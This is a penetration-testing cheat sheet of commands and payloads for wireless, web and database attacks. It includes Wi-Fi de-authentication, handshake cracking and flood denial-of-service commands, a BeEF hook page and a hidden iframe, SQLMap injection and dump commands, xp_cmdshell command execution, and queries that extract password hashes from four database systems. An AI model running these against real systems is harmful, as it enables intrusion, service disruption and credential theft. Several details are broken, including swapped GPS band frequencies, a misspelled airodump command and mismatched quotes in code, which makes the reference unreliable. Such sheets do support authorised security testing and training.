Table Of Contents

• Wireless
  • Frequency Chart
  • Helpful RF Websites
  • Kismet Command Reference
  • Linux Wi-Fi Commands
  • Linux Bluetooth
  • Linux Wi-Fi Testing
  • Wi-Fi DOS Attacks
• Web
  • User Agent String Keywords
  • HTML Beef Hook Technique
  • Embedded iframe
  • Firefox Type Conversions
  • Wget Capture Session Token
  • Curl
  • Automated Web Screenshots (WitnessMe)
  • SQLMap
• Databases
  • MSSQL
  • POSTGRES
  • MySQL
  • Oracle

---

Wireless

Frequency Chart

FREQUENCY-RANGE	CLASSIFICATION
125-134 kHz (LF) | 13.56 MHz (HF) | 433,860-930Mhz (UHF)	RFID
315 MHz (N. Am) | 433.92 MHz (Europe,Asia)	Keyless Entry
698-894 MHz | 1710-1755 MHz | 1850-1910 MHz | 2110-2155 MHz	Cellular (US)
1176.45 Mhz - L1 Band | 1227.60 Mhz - L2 Band | 1575.42 MHz - L5 Band	GPS
1-2 GHz	L Band
868 MHz (Europe) | 915 MHz (US,Australia) | 2.4 GHz (worldwide)	802.15.4 (ZigBee)
2.4-2.483.5 GHz	802.15.1 (Bluetooth)
2.4 GHz	802.11b/g
5.0 GHz	802.11n
4-8 GHz	C Band
12-18 GHz	Ku Band
18-26.5 GHz	K Band
26.5-40 GHz	Ka Band

HELPFUL RF WEBSITES

• FCC ID lookup: https://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm
• Frequency database: http://www.radioreference.com/apps/db/

KISMET COMMAND REFERENCE

• More info at: http://www.willhackforsushi.com/papers/80211_Pocket_Reference_Guide.pdf

BINDING	ACTION	|	BINDING	ACTION
e	List Kismet servers	|	r	Packet rate graph
h	Help	|	L	Lock channel hopping to selected channel
z	Toggle full-screen view	|	a	View network statistics
n	Name current network	|	H	Return to normal channel hopping
m	Toggle muting of sound	|	p	Dump packet type
i	View detailed information for network	|	+/-	Expand/collapse groups
t	Tag or untag selected network	|	f	Follow network center
s	Sort network list	|	CTRL+L	Re-draw the screen
g	Group tagged networks	|	w	Track alerts
l	Show wireless card power levels	|	c	Show clients in current network
u	Ungroup current group	|	Q	Quit Kismet
d	Dump printable strings	|	x	Close popup window

LINUX WI-FI COMMANDS

Display wireless interface configuration

iwconfig

List current state of wireless devices

rfkill list

Turn on wireless interface

rfkill unblock all

Monitor all interfaces

airodump -ng <INTERFACE_NAME>

Connect to unsecured Wi-Fi

iwconfig ath0 essid <BSSID> 
ifconfig ath0 up 
dhclient ath0

Connect to WEP Wi-Fi network

iwconfig ath0 essid <BSSID> key <WEB_KEY> 
ifconfig ath0 up 
dhclient ath0

Connect to WPA-PSK Wi-Fi network

iwconfig ath0 essid <BSSID> 
ifconfig ath0 up 
wpa_supplicant -B -i ath0 -c wpa-psk.conf 
dhclient ath0

LINUX BLUETOOTH

Turn on Bluetooth interface

hciconfig <INTERFACE_NAME> up

Scan for Bluetooth devices

hcitool -i <INTERFACE_NAME> scan --flush -all

List open services

sdptool browse <INTERFACE_NAME>

Set as discoverable

hciconfig <INTERFACE_NAME> name "<BLUETOOTH_NAME>" class 0x520204  
piscan

Clear pand sessions

pand -K

LINUX WI-FI TESTING

Stop monitor mode interface

airmon-ng stop <INTERFACE_NAME>

Start monitor mode interface

airmon-ng start <INTERFACE_NAME>
iwconfig <INTERFACE_NAME> channel <CHANNEL>

Capture traffic

airodump-ng -c <CHANNEL> --bssid <BSSID> -w file <OUTPUT_PATH>

Force client de-auth

aireplay-ng -0 10 -a <BSSID> -c <VICTIM_MAC> <INTERFACE_NAME>

Brute force handshake

# WPA-PSK
aircrack-ng -w <WORDLIST_PATH> <CAPTURED_HANDSHAKE_FILE_PATH>
# EAP-MD5
eapmd5pass -r <CAPTURED_HANDSHAKE_FILE_PATH> -w <WORDLIST_PATH>

WI-FI DOS ATTACKS

Auth Flood

mdk3 <INTERFACE_NAME> a -a <BSSID>

Beacon Flood

mdk3 <INTERFACE_NAME> b -c <CHANNEL>

WEB

USER AGENT STRING KEYWORDS

• Note: Keywords found in user agent strings aid in identifying the visiting operating system type.
• Keyword: iPhone | Apple iPhone

  Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/102.0.5005.87 Mobile/15E148 Safari/604.1
• Keyword: Android 12 | Android Phone

  Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.78 Mobile Safari/537.36
• Keyword: Windows NT 10.0 | Windows Computer

  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
• Keyword: Macintosh | Mac OS Computer

  Mozilla/5.0 (Macintosh; Intel Mac OS X 12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36

HTML BEEF HOOK TECHNIQUE

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">
 
<html>
<head>
<title><WEBSITE_TITLE></title>
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + ':<PORT>/<URI_TO_HOOK.JS> "
type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>
 
</head>
<WEBSITE_CONTENT>
</html>

EMBEDDED IFRAME

<iframe src="<URI/URL>" width="0" height="0" frameborder="0" tabindex="-1" title="empty" style=visibility:hidden;display:none"> </iframe>

FIREFOX TYPE CONVERSIONS

• ASCII -> Base64: javascript:btoa("<ASCII_STRING>")
• Base64 -> ASCII: javascript:atob("<BASE64>")
• ASCII -> URI: javascript:encodeURI("<ASCII_STRING>")
• URI -> ASCII: javascript:decodeURI("<ENCODED_URI>")

WGET CAPTURE SESSION TOKEN

wget -q --save-cookies=<OUTPUT_PATH> --keep-session-cookies --post-data="username:<USERNAME>&password=<PASSWORD>&Login=Login" <LOGIN_URL>

CURL

Grab headers and spoof user agent

curl -I -X HEAD -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" <URL>

Scrape site after login

curl -u <USERNAME>:<PASSWORD> -o <OUTPUT_FILE> <URL>

FTP

curl ftp://<USERNAME>:<PASSWORD>@<URL>/<DIRECTORY>

Sequential lookup

curl http://<URL>/<FILE_PATH>[1-10].txt

AUTOMATED WEB SCREENSHOTS (WITNESSME)

• Note: WitnessMe is a tool that takes screenshots of webpages using Pyppeteer.

Update packages

apt-get update

Install Docker

apt-get install docker.io

Installation

docker pull byt3bl33d3r/witnessme

Get image ID

docker images

Run docker container mounting /transfer to the current directory on the host machine

docker run -it --entrypoint=/bin/sh -v $(pwd):/transfer <IMAGE_ID>

Run and execute scan

witnessme screenshot <IP_CIDR> -p <PORT>,<PORT>

cd into created scan folder

cd <FILE_PATH>

Copy screenshotted files back to host machine current working directory

cp *.png /transfer/

SQLMAP

GET request

sqlmap.py -u "http://<URL>?id=1&str=val"

POST request

sqlmap.py -u "http://<URL>" --data="id=1&str=val"

SQL injection against specific parameter with DB type specified

sqlmap.py -u "http://<URL>" --data="id=1&str=val" -p "id" -b --dbms="<mssql|mysql|oracle|postgres>"

SQL injection on authenticated site

# Login and note cookie value (cookie1=val1, cookie2=val2)
sqlmap.py -u "http://<URL>" --data="id=1&str=val" -p "id" --cookie="cookie1=val1;cookie2=val2"

SQL injection and collect DB version, name, and user

sqlmap.py -u "http://<URL>" --data="id=1&str=val" -p "id" -b --current-db --current-user

SQL injection and get tables of DB=testdb

sqlmap.py -u "http://<URL>" --data="id=1&str=val" -p "id" --tables -D "testdb"

SQL injection and get columns of user table

sqlmap.py -u "http://<URL>" --data="id=1&str=val" -p "id" --columns -T "users"

DATABASES

MSSQL

DB version

SELECT @@version

Detailed version info

EXEC xp_msver

Run OS command

EXEC master..xp_cmdshell 'net user‘

Hostname & IP

SELECT HOST_NAME()

Current DB

SELECT DB_NAME()

List DBs

SELECT name FROM master..sysdatabases;

Current user

SELECT user_name()

List users

SELECT name FROM master..syslogins

List tables

SELECT name FROM master..sysobjects WHERE xtype='U';

List columns

SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable');

System table containing info on all tables

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

List all tables/columns

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')

Password hashes (2005)

SELECT name, password_hash FROM master.sys.sql_logins

POSTGRES

DB version

SELECT version();

Hostname & IP

SELECT inet_server_addr();

Current DB

SELECT current_database();

List DBs

SELECT datname FROM pg_database;

Current user

SELECT user;

List users

SELECT username FROM pg_user;

List password hashes

SELECT username,passwd FROM pg_shadow;

List columns

SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')

List tables

SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r',") AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)

MYSQL

DB version

SELECT @@version;

Hostname & IP

SELECT @@hostname;

Current DB

SELECT database();

List DBs

SELECT distinct(db) FROM mysql.db;

Current user

SELECT user();

List users

SELECT user FROM mysql.user;

List password hashes

SELECT host,user,password FROM mysql.user;

List all tables & columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

ORACLE

DB version

SELECT * FROM v$version;
SELECT version FROM v$instance;

Current DB

SELECT instance_name FROM v$instance;
SELECT name FROM v$database;

List DBs

SELECT DISTINCT owner FROM all_tables;

Current user

SELECT user FROM dual;

List users

SELECT username FROM all_users ORDER BY username;

List columns

SELECT column_name FROM all_tab_columns;

List tables

SELECT table_name FROM all_tables;

List password hashes

SELECT name, password, astatus FROM sys.user$;

List DBAs

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';